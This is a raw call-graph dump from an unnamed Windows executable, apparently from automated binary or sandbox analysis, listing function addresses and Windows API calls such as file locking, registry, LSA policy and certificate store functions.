75917->75922 75919->75909 75920->75870 75921->75920 75924 5f1c78 75922->75924 75930 5f1e35 SetFilePointer 75924->75930 75931 5f1c80 LockFileEx 75924->75931 75925 5f1d5b GetFileType 75928 5f1d6c 75925->75928 75929 5f1da8 SetFilePointer 75925->75929 75926 5f1d00 GetLastError 75927 5f1d23 GetCurrentThreadId 75926->75927 75932 5f1cb8 75926->75932 75927->75932 75928->75932 75933 5f1d80 GetCurrentThreadId 75928->75933 75929->75924 75934 5f1dc0 WriteFile 75929->75934 75937 5f1e6f 75930->75937 75938 5f2009 WriteFile 75930->75938 75931->75930 75931->75932 75932->75909 75940 5f20f8 LeaveCriticalSection 75932->75940 75933->75932 75934->75924 75936 5f1de3 GetLastError 75934->75936 75936->75932 75939 5f1e0a GetCurrentThreadId 75936->75939 75978 5f2842 269 API calls __EH_prolog3_catch_GS 75937->75978 75942 5f203e GetLastError 75938->75942 75943 5f1ece 75938->75943 75939->75932 75940->75909 75942->75943 75945 5f2065 GetCurrentThreadId 75942->75945 75943->75932 75948 5f20d4 UnlockFileEx 75943->75948 75944 5f1e84 75946 5f1ed7 SetFilePointer 75944->75946 75947 5f1e90 75944->75947 75945->75943 75950 5f1eeb GetLastError 75946->75950 75951 5f1f36 SetEndOfFile 75946->75951 75947->75943 75949 5f1e9f GetCurrentThreadId 75947->75949 75948->75932 75952 5f1ec5 75949->75952 75950->75943 75953 5f1f0e GetCurrentThreadId 75950->75953 75954 5f1f98 WriteFile 75951->75954 75955 5f1f46 GetLastError 75951->75955 75952->75943 75953->75952 75954->75938 75957 5f1fb7 GetLastError 75954->75957 75955->75943 75956 5f1f6d GetCurrentThreadId 75955->75956 75956->75952 75957->75943 75958 5f1fde GetCurrentThreadId 75957->75958 75958->75938 75960 5f10ff __EH_prolog3_catch_GS 75959->75960 75961 5f1148 GetLocalTime GetTimeZoneInformation 75960->75961 75966 5f117a _wcsrchr 75961->75966 75962 5f11d6 75963 5f11ff 75962->75963 75964 5f11f9 GetCurrentThreadId 75962->75964 75968 5f11e3 75962->75968 75980 5faa2c 269 API calls __EH_prolog3_catch 75963->75980 75964->75963 75966->75962 75979 5f2fbf 91 API calls vswprintf 75966->75979 75968->75900 75970 578164 75969->75970 75971 578159 CloseHandle 75969->75971 75970->75925 75970->75926 75971->75970 75973 5bcb5a 75972->75973 75981 5bcba8 75973->75981 75977 5bcb8b 75977->75906 75977->75915 75978->75944 75979->75962 75980->75968 75982 5bcbeb 75981->75982 75983 5bcbbb 75981->75983 75984 59f417 2 API calls 75982->75984 75985 5bcbc3 75983->75985 75986 5bcbd6 75983->75986 75989 5bcb72 75984->75989 75991 5bc6f1 VirtualAlloc RtlAllocateHeap 75985->75991 75992 5a05b3 HeapReAlloc VirtualAlloc RtlAllocateHeap RtlFreeHeap VirtualFree 75986->75992 75989->75977 75990 5bc724 RtlFreeHeap VirtualFree 75989->75990 75990->75977 75991->75989 75992->75989 75998 5d67ae GetLastError 75993->75998 75995 5d679c 75996 5d67a9 75995->75996 76012 5d4dd5 66 API calls 4 library calls 75995->76012 75996->75875 76013 5d5429 75998->76013 76000 5d67c3 76001 5d6811 SetLastError 76000->76001 76016 5d50bd 66 API calls 2 library calls 76000->76016 76001->75995 76003 5d67d6 76003->76001 76017 5d5448 TlsSetValue 76003->76017 76005 5d67ea 76006 5d6808 76005->76006 76007 5d67f0 76005->76007 76019 5d1f09 66 API calls 2 library calls 76006->76019 76018 5d681d 66 API calls 4 library calls 76007->76018 76010 5d67f8 GetCurrentThreadId 76010->76001 76011 5d680e 76011->76001 76012->75996 76014 5d543c 76013->76014 76015 5d5440 TlsGetValue 76013->76015 76014->76000 76015->76000 76016->76003 76017->76005 76018->76010 76019->76011 76021 5f166d __EH_prolog3_catch_GS 76020->76021 76102 5f0651 76021->76102 76023 5f1699 76024 59ef10 2 API calls 76023->76024 76028 5f1703 76023->76028 76024->76028 76025 5f17dc 76113 6154a5 ReleaseSemaphore ReleaseSemaphore 76025->76113 76027 5f178e 76027->75885 76028->76025 76029 5f173d 76028->76029 76030 5f1794 76028->76030 76031 5f1749 GetCurrentThreadId 76029->76031 76032 5f1773 76029->76032 76110 5f031a 69 API calls __EH_prolog3_catch 76030->76110 76031->76032 76108 577d91 RtlFreeHeap VirtualFree __EH_prolog3 76032->76108 76035 5f1782 76109 6154a5 ReleaseSemaphore ReleaseSemaphore 76035->76109 76037 5f17c4 76111 65a060 RtlFreeHeap VirtualFree __EH_prolog3 76037->76111 76039 5f17d0 76112 577d91 RtlFreeHeap VirtualFree __EH_prolog3 76039->76112 76042 5f9a04 __EH_prolog3_catch_GS 76041->76042 76045 5f9a4a 76042->76045 76120 5d0e41 66 API calls 76042->76120 76044 5f9a64 76044->75887 76045->76044 76046 5f9ab0 RegOpenKeyExW 76045->76046 76047 5f9adf 76046->76047 76048 5f9b3d RegQueryValueExW 76046->76048 76052 5f9af9 GetCurrentThreadId 76047->76052 76054 5f9b1c 76047->76054 76049 5f9b5c 76048->76049 76050 5f9b9b 76048->76050 76053 5f9b76 GetCurrentThreadId 76049->76053 76049->76054 76051 5f9ba1 76050->76051 76057 5f9bde 76050->76057 76051->76054 76056 5f9bb6 GetCurrentThreadId 76051->76056 76052->76054 76053->76054 76055 5f9b34 76054->76055 76121 5f0dba 6 API calls 76054->76121 76059 5f9f1e RegCloseKey 76055->76059 76060 5f9f27 76055->76060 76056->76054 76122 5fae3f 98 API calls __EH_prolog3_catch 76057->76122 76059->76060 76060->76044 76062 5f9f32 FreeLibrary 76060->76062 76062->76044 76063 5f9bff 76064 5f9c14 GetCurrentThreadId 76063->76064 76065 5f9c40 76063->76065 76071 5f9c55 76063->76071 76064->76065 76067 59ef10 2 API calls 76065->76067 76066 5f4ccf 76 API calls 76066->76071 76067->76071 76069 59ef10 RtlFreeHeap VirtualFree 76069->76071 76070 5f9cec SetErrorMode LoadLibraryExW 76072 5f9d4e SetErrorMode 76070->76072 76073 5f9d1b 76070->76073 76071->76066 76071->76069 76071->76070 76123 605eb4 76071->76123 76075 5f9d5e 76072->76075 76081 5f9db9 76072->76081 76142 6087ad 87 API calls 2 library calls 76073->76142 76079 5f9d78 GetCurrentThreadId 76075->76079 76080 5f9da4 76075->76080 76076 5f9e21 GetProcAddress 76078 5f9ed6 76076->76078 76089 5f9e35 76076->76089 76077 5f9d2c LoadLibraryExW GetLastError 76077->76072 76082 59ef10 2 API calls 76078->76082 76079->76080 76083 59ef10 2 API calls 76080->76083 76081->76076 76084 5f9dd7 GetCurrentThreadId 76081->76084 76085 5f9e03 76081->76085 76086 5f9ef9 76082->76086 76083->76081 76084->76085 76087 59ef10 2 API calls 76085->76087 76086->76055 76088 5f9e18 76087->76088 76088->76076 76090 5f9e4f GetCurrentThreadId 76089->76090 76091 5f9e7b 76089->76091 76093 5f9e90 76089->76093 76090->76091 76092 59ef10 2 API calls 76091->76092 76092->76093 76094 59ef10 2 API calls 76093->76094 76094->76078 76096 57780b __EH_prolog3 76095->76096 76097 59ef10 2 API calls 76096->76097 76098 577826 76097->76098 76099 59ef10 2 API calls 76098->76099 76100 57783b 76099->76100 76100->75884 76101->75891 76103 5f065d __EH_prolog3_catch 76102->76103 76114 6153f3 GetCurrentThreadId 76103->76114 76105 5f067d 76106 5f068f 76105->76106 76118 5d21c0 RaiseException 76105->76118 76106->76023 76108->76035 76109->76027 76110->76037 76111->76039 76112->76025 76113->76027 76115 61540a 76114->76115 76117 61543f 76114->76117 76115->76117 76119 61560c WaitForSingleObject Sleep CreateSemaphoreW 76115->76119 76117->76105 76118->76106 76119->76117 76120->76045 76121->76055 76122->76063 76124 605ec0 __EH_prolog3_catch_GS 76123->76124 76125 605eeb 76124->76125 76126 605f3d 76124->76126 76128 605ef4 GetCurrentThreadId 76125->76128 76129 605f22 76125->76129 76143 608d50 76126->76143 76128->76129 76135 605f34 76129->76135 76188 5f0dba 6 API calls 76129->76188 76130 605f52 76131 605f58 76130->76131 76132 605f9c 76130->76132 76137 605f61 GetCurrentThreadId 76131->76137 76138 605f8b 76131->76138 76152 608f91 76132->76152 76135->76071 76137->76138 76189 577d91 RtlFreeHeap VirtualFree __EH_prolog3 76138->76189 76142->76077 76144 608d5c __EH_prolog3_catch 76143->76144 76145 608d84 76144->76145 76147 608ddc 76144->76147 76146 608d97 GetCurrentThreadId 76145->76146 76148 608dc0 76145->76148 76146->76148 76147->76148 76149 608df6 GetCurrentThreadId 76147->76149 76151 608dd6 76148->76151 76190 5f0dba 6 API calls 76148->76190 76149->76148 76151->76130 76153 608f9d __EH_prolog3_catch_GS 76152->76153 76188->76135 76189->76129 76190->76151 76234 5f6646 __EH_prolog3 76233->76234 76235 5f665e RegCloseKey 76234->76235 76236 5f666a 76234->76236 76235->76236 76236->75689 76238 5b185d 76237->76238 76239 5b184c 76237->76239 76242 5f7229 76238->76242 76269 5fc812 15 API calls __EH_prolog3_catch 76239->76269 76241 5b1856 76241->76238 76243 5f7235 __EH_prolog3_catch 76242->76243 76245 5f725c 76243->76245 76270 5f6706 76243->76270 76249 5f7271 76245->76249 76276 5f0dba 6 API calls 76245->76276 76249->75695 76251 5f72e2 76251->76245 76252 5f7305 76251->76252 76253 5f72f2 76251->76253 76252->76245 76255 5f730e 76252->76255 76254 5f66cd RegCloseKey 76253->76254 76256 5f72fa 76254->76256 76277 5fc812 15 API calls __EH_prolog3_catch 76255->76277 76258 5f7332 RegOpenKeyExW 76256->76258 76258->76245 76259 5f731b 76259->76245 76260 5f66cd RegCloseKey 76259->76260 76261 5f7329 76260->76261 76261->76258 76263 5f669c __EH_prolog3 76262->76263 76264 5f6706 RegCloseKey 76263->76264 76265 5f66b0 76264->76265 76266 5f66ba RegCloseKey 76265->76266 76267 5f66c7 76265->76267 76266->76267 76267->75699 76268->75700 76269->76241 76271 5f671e 76270->76271 76272 5f6711 RegCloseKey 76270->76272 76271->76245 76273 5f66cd 76271->76273 76272->76271 76274 5f66d7 RegCloseKey 76273->76274 76275 5f66e2 RegOpenKeyExW 76273->76275 76274->76275 76275->76251 76276->76249 76277->76259 76279 6422b4 __EH_prolog3_catch_GS 76278->76279 76280 5f52cb 67 API calls 76279->76280 76281 6423ad 76280->76281 76404 64376c 76281->76404 76283 6423d5 76286 5f52cb 67 API calls 76283->76286 76289 642ed5 76283->76289 76285 64241c 76457 648930 442 API calls __EH_prolog3_catch_GS 76285->76457 76286->76289 76288 64242a 76290 6424bd 76288->76290 76291 64243a 76288->76291 76436 59f01d 76289->76436 76459 641581 437 API calls __EH_prolog3_catch 76290->76459 76299 64244e GetCurrentThreadId 76291->76299 76310 642472 76291->76310 76292 6423b3 76292->76285 76294 592624 269 API calls 76292->76294 76315 6423b8 76292->76315 76294->76285 76295 6424c6 76297 6424d2 76295->76297 76309 642537 76295->76309 76306 6424e6 GetCurrentThreadId 76297->76306 76297->76310 76299->76310 76300 59ef10 2 API calls 76302 642f2a 76300->76302 76301 642566 76304 64257c 76301->76304 76305 6425ca 76301->76305 76442 63bfaa 76302->76442 76303 592624 269 API calls 76336 6424a0 76303->76336 76313 642596 GetCurrentThreadId 76304->76313 76304->76315 76461 640d56 269 API calls __EH_prolog3_catch_GS 76305->76461 76306->76310 76309->76301 76460 64a73e 71 API calls 76309->76460 76310->76303 76313->76315 76315->76283 76456 5f0dba 6 API calls 76315->76456 76319 6425da 76320 64261e 76319->76320 76323 6425fa GetCurrentThreadId 76319->76323 76321 642680 76320->76321 76324 592624 269 API calls 76320->76324 76462 649521 286 API calls __EH_prolog3_catch 76321->76462 76323->76320 76324->76321 76327 6426a9 76329 6426b5 76327->76329 76330 6426f9 76327->76330 76333 6426c8 GetCurrentThreadId 76329->76333 76329->76336 76332 642717 76330->76332 76345 642754 76330->76345 76332->76336 76339 64272c GetCurrentThreadId 76332->76339 76333->76336 76335 642918 76336->76283 76458 5f0dba 6 API calls 76336->76458 76339->76336 76341 642893 76341->76336 76344 6427a3 76344->76336 76345->76335 76345->76336 76345->76341 76345->76344 76346 6428d3 76345->76346 76357 642821 GetCurrentThreadId 76345->76357 76463 64a27e 284 API calls __EH_prolog3_catch_GS 76345->76463 76464 640801 282 API calls __EH_prolog3_catch 76345->76464 76465 5a0532 71 API calls 76345->76465 76346->76315 76357->76345 76385 57808e __EH_prolog3 76384->76385 76386 59ef10 2 API calls 76385->76386 76387 5780ab 76386->76387 76388 59ef10 2 API calls 76387->76388 76389 5780bf 76388->76389 76390 59ef10 2 API calls 76389->76390 76391 5780d5 76390->76391 76391->75732 76393 586ee8 76392->76393 76394 59ef96 76392->76394 76393->75742 76581 59e943 RtlFreeHeap VirtualFree 76394->76581 76396 59efa0 76397 5f3f60 2 API calls 76396->76397 76397->76393 76398->75738 76399->75711 76400->75725 76401->75743 76402->75736 76403->75738 76405 64377b __EH_prolog3_catch_GS 76404->76405 76472 62552c 76405->76472 76407 6437cf 76408 643829 76407->76408 76411 6437d5 76407->76411 76478 615014 76408->76478 76410 643836 76413 643890 76410->76413 76416 643842 76410->76416 76414 592624 269 API calls 76411->76414 76417 643809 76411->76417 76493 6492a2 76413->76493 76414->76417 76416->76417 76421 592624 269 API calls 76416->76421 76418 643820 76417->76418 76524 5f0dba 6 API calls 76417->76524 76418->76292 76419 6438ad 76420 6438bb 76419->76420 76424 6438e6 76419->76424 76525 64121f 287 API calls __EH_prolog3_catch 76420->76525 76421->76417 76422 59ef10 2 API calls 76425 64394c 76422->76425 76424->76422 76434 643985 76424->76434 76427 59ef10 2 API calls 76425->76427 76426 6438df 76426->76424 76428 6438e3 76426->76428 76433 592624 269 API calls 76426->76433 76429 643961 76427->76429 76428->76424 76429->76417 76526 648b33 432 API calls __EH_prolog3_catch 76429->76526 76431 643973 76431->76417 76433->76428 76434->76417 76435 592624 269 API calls 76434->76435 76435->76417 76437 59f038 76436->76437 76438 59f027 76436->76438 76437->76300 76576 59e965 RtlFreeHeap VirtualFree 76438->76576 76440 59f031 76441 5f3f60 2 API calls 76440->76441 76441->76437 76443 63bfb6 __EH_prolog3 76442->76443 76577 65c1ab 76443->76577 76445 63bfc9 76446 59ef10 2 API calls 76445->76446 76447 63bfde 76446->76447 76448 59ef10 2 API calls 76447->76448 76449 63bff2 76448->76449 76456->76283 76457->76288 76458->76283 76459->76295 76460->76301 76461->76319 76462->76327 76463->76345 76464->76345 76465->76345 76473 625538 __EH_prolog3_catch 76472->76473 76527 61f559 76473->76527 76475 625571 76477 62558a 76475->76477 76548 5f0dba 6 API calls 76475->76548 76477->76407 76479 615020 __EH_prolog3_catch 76478->76479 76552 619dbf 76479->76552 76482 615078 76483 615084 GetCurrentThreadId 76482->76483 76484 6150a4 76482->76484 76483->76484 76490 6150ba 76484->76490 76558 5f0dba 6 API calls 76484->76558 76485 6150c3 76487 6150e2 76485->76487 76489 615110 76485->76489 76487->76484 76488 6150ee GetCurrentThreadId 76487->76488 76488->76484 76489->76484 76491 61514c 76489->76491 76490->76410 76491->76490 76559 5f0dba 6 API calls 76491->76559 76494 6492ae __EH_prolog3_catch 76493->76494 76495 6492da 76494->76495 76501 6492f6 76494->76501 76497 6492f1 76495->76497 76573 5f0dba 6 API calls 76495->76573 76497->76419 76498 64932a 76562 6406f3 76498->76562 76500 649335 76502 64938d LsaQueryInformationPolicy 76500->76502 76503 64933e 76500->76503 76501->76498 76504 592624 269 API calls 76501->76504 76505 6493e4 76502->76505 76506 64939f LsaNtStatusToWinError 76502->76506 76509 64934a GetCurrentThreadId 76503->76509 76511 64936d 76503->76511 76504->76498 76506->76505 76509->76511 76524->76418 76525->76426 76526->76431 76528 61f565 __EH_prolog3_catch 76527->76528 76529 5f663a RegCloseKey 76528->76529 76530 61f56d 76529->76530 76531 61f593 76530->76531 76532 61f5ec 76530->76532 76537 61f5a6 GetCurrentThreadId 76531->76537 76543 61f5cc 76531->76543 76533 61f5f2 76532->76533 76534 61f62d 76532->76534 76538 61f605 GetCurrentThreadId 76533->76538 76533->76543 76535 5f7229 19 API calls 76534->76535 76536 61f644 76535->76536 76536->76543 76550 5f6bc9 7 API calls __EH_prolog3_catch 76536->76550 76537->76543 76538->76543 76541 5f6690 2 API calls 76544 61f69e 76541->76544 76542 61f660 76542->76543 76545 61f669 76542->76545 76546 61f5e3 76543->76546 76549 5f0dba 6 API calls 76543->76549 76544->76475 76545->76546 76551 5f0dba 6 API calls 76545->76551 76546->76541 76548->76477 76549->76546 76550->76542 76551->76546 76553 619dd1 76552->76553 76555 61506f 76552->76555 76560 6109e6 EnterCriticalSection __EH_prolog3_catch 76553->76560 76555->76482 76555->76485 76556 619ddf 76561 610a36 LeaveCriticalSection __EH_prolog3_catch 76556->76561 76558->76490 76559->76490 76560->76556 76561->76555 76563 6406ff __EH_prolog3_catch 76562->76563 76564 640721 76563->76564 76565 640772 LsaOpenPolicy 76563->76565 76568 640732 GetCurrentThreadId 76564->76568 76570 640755 76564->76570 76566 640791 LsaNtStatusToWinError 76565->76566 76565->76570 76567 64079b 76566->76567 76566->76570 76567->76570 76571 6407ac GetCurrentThreadId 76567->76571 76568->76570 76572 64076c 76570->76572 76575 5f0dba 6 API calls 76570->76575 76571->76570 76572->76500 76573->76497 76575->76572 76576->76440 76578 65c1b7 __EH_prolog3 76577->76578 76579 59ef10 2 API calls 76578->76579 76580 65c1d1 76579->76580 76580->76445 76581->76396 76583 5f4cdb __EH_prolog3_catch 76582->76583 76584 5f4d53 76583->76584 76585 5f4d02 76583->76585 76595 5f4a81 76584->76595 76588 5f4d13 GetCurrentThreadId 76585->76588 76589 5f4d3d 76585->76589 76588->76589 76592 5f4d4d 76589->76592 76599 5f0dba 6 API calls 76589->76599 76601 5d21c0 RaiseException 76592->76601 76594 5f4d6a 76594->75754 76596 5f4a91 76595->76596 76602 5f4aa2 76596->76602 76598 5f4a9d 76598->76594 76600 5f0dba 6 API calls 76598->76600 76599->76592 76600->76594 76601->76594 76603 5f4ab4 76602->76603 76604 5f4ab8 76603->76604 76605 5f4ad6 76603->76605 76615 5f49d9 71 API calls 76604->76615 76606 5f4b3c 76605->76606 76607 5f4ae6 76605->76607 76616 5d0c66 67 API calls 2 library calls 76606->76616 76610 59ea94 71 API calls 76607->76610 76614 5f4ad4 76607->76614 76610->76614 76614->76598 76615->76614 76618 5f5dd3 __EH_prolog3_catch_GS 76617->76618 76619 5f5e6e 76618->76619 76620 5f5e17 76618->76620 76621 5facce 100 API calls 76619->76621 76623 5f5e2b GetCurrentThreadId 76620->76623 76624 5f5e55 76620->76624 76622 5f5e86 76621->76622 76627 5f5e8a 76622->76627 76639 5faaed 269 API calls __EH_prolog3_catch 76622->76639 76623->76624 76628 5f5e65 76624->76628 76638 5f0dba 6 API calls 76624->76638 76627->76628 76640 5f0dba 6 API calls 76627->76640 76634 5f5fdf 76628->76634 76641 5d21c0 RaiseException 76628->76641 76630 5f5ed5 76632 5f5ef4 GetCurrentThreadId 76630->76632 76633 5f5f5c 76630->76633 76636 5f5f21 76630->76636 76632->76636 76635 59f417 2 API calls 76633->76635 76634->75763 76635->76627 76636->76633 76637 592624 267 API calls 76636->76637 76637->76633 76638->76628 76639->76630 76640->76628 76641->76634 76642->75772 76643->75775 76644->75771 76645->75789 76646->75789 76647->75786 76648 635296 76649 6352a2 __EH_prolog3_catch 76648->76649 76650 66c86b 66 API calls 76649->76650 76651 63531a 76650->76651 76652 5f094c 269 API calls 76651->76652 76656 635335 76652->76656 76653 635376 76654 5f663a RegCloseKey 76653->76654 76655 635380 76654->76655 76658 635395 GetSystemTime 76655->76658 76656->76653 76657 592624 269 API calls 76656->76657 76657->76653 76659 5f7229 19 API calls 76658->76659 76660 6353fa 76659->76660 76661 63546c 76660->76661 76681 5f6fe7 82 API calls __EH_prolog3_catch 76660->76681 76663 63547b 76661->76663 76685 5f0dba 6 API calls 76661->76685 76667 5f6690 2 API calls 76663->76667 76665 63540c 76682 5f6fe7 82 API calls __EH_prolog3_catch 76665->76682 76669 6354af 76667->76669 76668 635420 76671 5f52af 68 API calls 76668->76671 76670 6354be 76669->76670 76686 5f0b59 82 API calls 2 library calls 76669->76686 76673 66c86b 66 API calls 76670->76673 76675 635436 76671->76675 76676 6354ea 76673->76676 76674 635444 76683 5f6bc9 7 API calls __EH_prolog3_catch 76674->76683 76675->76674 76677 5f52cb 67 API calls 76675->76677 76677->76674 76679 635458 76684 5f6bc9 7 API calls __EH_prolog3_catch 76679->76684 76681->76665 76682->76668 76683->76679 76684->76661 76685->76663 76686->76670 76687 59c1fc 76688 59ef10 2 API calls 76687->76688 76689 59c20c 76688->76689 76690 58048f 76691 580493 76690->76691 76692 5804c4 76691->76692 76693 5f52af 68 API calls 76691->76693 76705 5804e8 76692->76705 76771 5a162c 76692->76771 76693->76692 76695 58056a 76696 59ef10 2 API calls 76695->76696 76697 58059d 76696->76697 76698 5805b2 76697->76698 76699 59ef10 2 API calls 76697->76699 76740 5a2aa8 76698->76740 76699->76698 76700 5f4ccf 76 API calls 76700->76705 76705->76695 76705->76700 76706 59ef10 RtlFreeHeap VirtualFree 76705->76706 76809 578f19 71 API calls 76705->76809 76706->76705 76707 5805d2 76708 59ef10 2 API calls 76707->76708 76709 5805fc 76708->76709 76710 58068f 76709->76710 76712 5f52af 68 API calls 76709->76712 76715 580738 76710->76715 76810 5b2fc1 472 API calls 76710->76810 76713 580623 76712->76713 76713->76710 76747 5b7119 76713->76747 76714 58069e 76714->76715 76716 5806a7 76714->76716 76719 58074a 76715->76719 76812 5f0dba 6 API calls 76715->76812 76717 5f646b 76 API calls 76716->76717 76730 5806d8 76717->76730 76721 59ef10 2 API calls 76719->76721 76722 5807ee 76721->76722 76724 59ef10 2 API calls 76722->76724 76723 5a162c 83 API calls 76723->76710 76726 5807ff 76724->76726 76725 58063c 76725->76715 76725->76723 76727 59ef10 2 API calls 76726->76727 76729 580810 76727->76729 76731 59ef10 2 API calls 76729->76731 76732 59ef10 2 API calls 76730->76732 76811 578f19 71 API calls 76730->76811 76733 58081e 76731->76733 76732->76730 76734 59ef10 2 API calls 76733->76734 76735 58082f 76734->76735 76736 59ef10 2 API calls 76735->76736 76737 580841 76736->76737 76738 59f01d 2 API calls 76737->76738 76739 580850 76738->76739 76813 62f296 76740->76813 76743 5a1cab 76744 5a1cb7 __EH_prolog3_GS 76743->76744 76745 59ef10 2 API calls 76744->76745 76746 5a1cf8 76745->76746 76746->76707 76748 5b7125 __EH_prolog3_catch 76747->76748 76749 5f663a RegCloseKey 76748->76749 76750 5b712d 76749->76750 76751 5f52cb 67 API calls 76750->76751 76752 5b7160 76751->76752 76753 5b183e 15 API calls 76752->76753 76754 5b7169 76753->76754 76755 5f7229 19 API calls 76754->76755 76756 5b7180 76755->76756 76757 5b7189 76756->76757 76758 5b71d5 76756->76758 76761 5b7195 GetCurrentThreadId 76757->76761 76765 5b71b8 76757->76765 77148 5f6fe7 82 API calls __EH_prolog3_catch 76758->77148 76760 5b71e5 76762 5b721f 76760->76762 76763 5b71ee 76760->76763 76761->76765 76764 5b71cf 76762->76764 77149 5f0dba 6 API calls 76762->77149 76763->76765 76768 5b71fa GetCurrentThreadId 76763->76768 76769 5f6690 2 API calls 76764->76769 76765->76764 77147 5f0dba 6 API calls 76765->77147 76768->76765 76770 5b7254 76769->76770 76770->76725 76773 5a1638 __EH_prolog3_GS 76771->76773 76772 5a1880 76772->76705 76773->76772 76774 5f65b4 67 API calls 76773->76774 76775 5a1670 76774->76775 76776 5f65f4 67 API calls 76775->76776 76782 5a1678 76776->76782 76777 5f65b4 67 API calls 76778 5a170e 76777->76778 76779 5f65f4 67 API calls 76778->76779 76780 5a1716 76779->76780 77150 578676 76780->77150 76782->76777 76783 5a1732 76784 59ef10 2 API calls 76783->76784 76785 5a1755 76784->76785 76786 5a175f lstrcmpiW 76785->76786 76808 5a1779 76785->76808 76787 5a1771 76786->76787 76788 5a1785 lstrcmpiW 76786->76788 77156 5f6430 67 API calls 76787->77156 76791 5a1791 76788->76791 76792 5a17a5 lstrcmpiW 76788->76792 76789 59ef10 2 API calls 76789->76772 77157 5f6430 67 API calls 76791->77157 76794 5a17c0 lstrcmpiW 76792->76794 76795 5a17b1 76792->76795 76796 5a17d4 lstrcmpiW 76794->76796 76794->76808 77158 5f6430 67 API calls 76795->77158 76798 5a17e5 lstrcmpiW 76796->76798 76796->76808 76799 5a17f6 lstrcmpiW 76798->76799 76798->76808 76800 5a180f lstrcmpiW 76799->76800 76801 5a1802 76799->76801 76803 5a181b 76800->76803 76804 5a1828 lstrcmpiW 76800->76804 77159 5f6430 67 API calls 76801->77159 77160 5f6430 67 API calls 76803->77160 76806 5a183c lstrcmpiW 76804->76806 76804->76808 76807 5a1850 lstrcmpiW 76806->76807 76806->76808 76807->76808 76808->76789 76809->76705 76810->76714 76811->76730 76812->76719 76822 62f212 76813->76822 76815 62f2a9 76816 5f52af 68 API calls 76815->76816 76817 62f2ca 76815->76817 76816->76817 76826 622d2a 76817->76826 76819 62f2f3 76820 5805bd 76819->76820 76821 62f30a CertFreeCertificateContext 76819->76821 76820->76743 76821->76820 76823 62f224 76822->76823 76874 57840c 76823->76874 76825 62f244 76825->76815 76827 622d36 __EH_prolog3_catch_GS 76826->76827 76828 622d87 76827->76828 76829 622ddc 76827->76829 76833 622d98 GetCurrentThreadId 76828->76833 76834 622dbb 76828->76834 76830 5f52cb 67 API calls 76829->76830 76831 622de9 76830->76831 76892 623dd4 76831->76892 76833->76834 76835 622dd3 76834->76835 77029 5f0dba 6 API calls 76834->77029 76841 59ef10 2 API calls 76835->76841 76836 622df2 76838 622dfb 76836->76838 76839 622e2c 76836->76839 76838->76834 76846 622e07 GetCurrentThreadId 76838->76846 76840 5f52cb 67 API calls 76839->76840 76842 622e37 76840->76842 76843 622feb 76841->76843 76906 623cb6 76842->76906 76845 59ef10 2 API calls 76843->76845 76848 622ff9 76845->76848 76846->76834 76847 622e40 76849 622e81 76847->76849 76850 622e49 76847->76850 76851 59ef10 2 API calls 76848->76851 76852 622e94 76849->76852 77030 624fcf 24 API calls __EH_prolog3_catch 76849->77030 76850->76834 76857 622e59 GetCurrentThreadId 76850->76857 76853 623008 76851->76853 76855 622eb7 76852->76855 76858 622ea1 76852->76858 76853->76819 76856 5f52cb 67 API calls 76855->76856 76860 622ec2 76856->76860 76857->76834 76859 5f52cb 67 API calls 76858->76859 76861 622eac 76859->76861 77032 623d45 76860->77032 77031 625048 99 API calls __EH_prolog3_catch 76861->77031 76864 622eb5 76869 622ef5 76864->76869 77042 5f5277 68 API calls __wcsnicmp 76864->77042 76867 622f50 76922 623034 76867->76922 76916 624502 76869->76916 76870 622fa9 76870->76835 77043 5f0dba 6 API calls 76870->77043 76872 622f68 76872->76834 76872->76870 76873 622f81 GetCurrentThreadId 76872->76873 76873->76870 76875 578418 __EH_prolog3_catch 76874->76875 76876 578465 76875->76876 76877 57846c 76875->76877 76878 578459 76875->76878 76876->76825 76880 5784b7 76877->76880 76881 57848f 76877->76881 76888 59e965 RtlFreeHeap VirtualFree 76878->76888 76880->76876 76882 578511 76880->76882 76890 59e965 RtlFreeHeap VirtualFree 76880->76890 76889 59e965 RtlFreeHeap VirtualFree 76881->76889 76891 59e245 69 API calls 76882->76891 76886 57850a 76887 5f3f60 2 API calls 76886->76887 76887->76882 76888->76876 76889->76876 76890->76886 76891->76876 76893 623de0 __EH_prolog3_catch 76892->76893 76894 5f52cb 67 API calls 76893->76894 76899 623e0a 76893->76899 76895 623e2d 76894->76895 77044 61f862 76895->77044 76898 623e1c 76898->76836 76899->76898 77067 5f0dba 6 API calls 76899->77067 76900 623e3d 76900->76899 76901 5f52af 68 API calls 76900->76901 76902 623e53 76901->76902 76902->76899 77068 5f65b4 76902->77068 76907 623cc2 __EH_prolog3_catch 76906->76907 76908 61f862 99 API calls 76907->76908 76909 623ceb 76907->76909 76910 623d13 76908->76910 76915 623cfb 76909->76915 77079 5f0dba 6 API calls 76909->77079 76911 5f65b4 67 API calls 76910->76911 76913 623d1b 76911->76913 76914 5f65f4 67 API calls 76913->76914 76914->76909 76915->76847 76917 62450e __EH_prolog3_catch 76916->76917 76918 61f559 24 API calls 76917->76918 76919 624536 76917->76919 76918->76919 76921 624548 76919->76921 77080 5f0dba 6 API calls 76919->77080 76921->76867 76923 623043 __EH_prolog3_catch_GS 76922->76923 76924 623127 76923->76924 76925 6230cd 76923->76925 76926 623131 76924->76926 76929 62316c 76924->76929 76927 6230e0 GetCurrentThreadId 76925->76927 76930 623106 76925->76930 76928 623144 GetCurrentThreadId 76926->76928 76926->76930 76927->76930 76928->76930 76933 62318b 76929->76933 76938 6231da 76929->76938 76931 62311e 76930->76931 77130 5f0dba 6 API calls 76930->77130 76934 59ef10 2 API calls 76931->76934 76935 5a0c32 71 API calls 76933->76935 76936 623a7a 76934->76936 76941 62319f 76935->76941 76937 59ef10 2 API calls 76936->76937 76939 623a88 76937->76939 76943 5a0c32 71 API calls 76938->76943 76956 6231c7 76938->76956 76940 59ef10 2 API calls 76939->76940 76942 623a97 76940->76942 76944 59ef10 2 API calls 76941->76944 76942->76872 76949 62320b 76943->76949 76944->76956 76945 623257 CertOpenStore 76946 6232f2 76945->76946 76947 62326f GetLastError 76945->76947 77081 6240ce 76946->77081 76948 62328b 76947->76948 76954 623294 GetCurrentThreadId 76948->76954 76955 6232b8 76948->76955 76952 59ef10 2 API calls 76949->76952 76951 623311 76953 62331a 76951->76953 76975 62336a 76951->76975 76952->76956 76958 62334f 76953->76958 76959 623326 GetCurrentThreadId 76953->76959 76954->76955 76957 592624 269 API calls 76955->76957 76956->76945 76957->76946 76960 623361 76958->76960 77131 5f0dba 6 API calls 76958->77131 76959->76958 76963 623a59 CertCloseStore 76960->76963 76964 623a5d 76960->76964 76961 62348b 76961->76958 76965 592624 269 API calls 76961->76965 76963->76964 